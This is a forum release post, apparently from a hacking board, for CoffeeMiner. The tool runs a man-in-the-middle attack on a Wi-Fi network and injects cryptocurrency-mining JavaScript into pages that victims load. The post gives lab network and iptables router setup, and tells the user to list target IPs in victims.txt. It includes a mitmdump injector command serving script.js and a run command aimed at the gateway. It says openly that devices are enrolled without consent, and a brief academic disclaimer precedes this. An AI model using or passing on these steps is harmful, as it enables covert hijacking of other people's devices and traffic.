release CoffeeMiner - Crypto Mining Pool Using MITM Techniques

[Black_Rose©]

 

 

Instructions to setup VirtualBox scenario

This is the hidden content, please

• Sign In
• or
• Sign Up

In each machine, remember to setup the dns server, for example, in /etc/resolv.conf:

nameserver 8.8.8.8

 

Victim

This is the hidden content, please

• Sign In
• or
• Sign Up

• network adapter:
  • Host-only Adapter
• /etc/network/interfaces:

auto lo
iface lo inet loopback

auto eth0
iface eth0 inet static
    address 10.0.2.20
    netmask 255.255.255.0
    gateway 10.0.2.15

 

Attacker

This is the hidden content, please

• Sign In
• or
• Sign Up

• network adapter:
  • Host-only Adapter
• /etc/network/interfaces:

auto lo
iface lo inet loopback

auto eth0
iface eth0 inet static
    address 10.0.2.10
    netmask 255.255.255.0
    gateway 10.0.2.15

 

Gateway

This is the hidden content, please

• Sign In
• or
• Sign Up

• network adapter:
  • Bridged Adapter
  • Host-only Adapter
• /etc/network/interfaces:

auto lo
iface lo inet loopback

auto eth0
iface eth0 inet dhcp

auto eth1
iface eth1 inet static
    address 10.0.2.15
    netmask 255.255.255.0

 

Clean IPTABLES:

iptables --flush
iptables --table nat --flush

 

Configure the Gateway machine as a router:

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

iptables -A FORWARD -i eth0 -o eth1 -j ACCEPT
iptables -A FORWARD -i eth1 -o eth0 -j ACCEPT

 

 

Disclaimer: This project is intended for academic and research purposes only.

CoffeeMiner is an innovative conceptual framework that utilizes a man-in-the-middle (MITM) attack to create a cryptocurrency mining pool on Wi-Fi networks. This method effectively turns the devices of unsuspecting users into mining participants without their explicit consent.

Overview of CoffeeMiner

The foundation of CoffeeMiner revolves around a simple, yet effective, mechanism:

1. It conducts a MITM attack targeting all selected users within the local network.
2. The framework injects a JavaScript script into the HTML pages that the victims are accessing.
3. This injected script contains cryptocurrency mining code.
4. Consequently, all devices connected to the same LAN network as the victims begin mining for the benefit of CoffeeMiner.

How to Set Up CoffeeMiner

To get started with CoffeeMiner, follow these essential steps:

1. Installation:

   • Run the installer script by executing in the terminal:

• • bash install.sh
        

• Configuration:

  • Edit the victims.txt file to include one IP address per line, specifying the devices you intend to target.
  • Modify the coffeeMiner.py file on line 28 to input the IP address of the CoffeeMiner HTTP server:

• • os.system("~/.local/bin/mitmdump -s 'injector.py http://10.0.2.20:8000/script.js' -T")
        

• Execution:

  • Finally, execute the main program using:

3. • python3 coffeeMiner.py ipgateway
         

   • Replace ipgateway with the IP address of your network's gateway.

Networking

For those interested in deploying CoffeeMiner in a controlled academic scenario, comprehensive instructions can be found in the official documentation on

This is the hidden content, please

• Sign In
• or
• Sign Up

.

Ethical Considerations

While CoffeeMiner presents a compelling case for understanding network vulnerabilities and the potential misuse of technology, it is crucial to approach projects like this with caution and ethical considerations in mind. Unauthorized use of such techniques can lead to serious legal repercussions and violate users’ privacy rights.

 

This is the hidden content, please

• Sign In
• or
• Sign Up

This is the hidden content, please

• Sign In
• or
• Sign Up

This is the hidden content, please

• Sign In
• or
• Sign Up

This is the hidden content, please

• Sign In
• or
• Sign Up

This is the hidden content, please

• Sign In
• or
• Sign Up

Spoiler

Author - arnaucube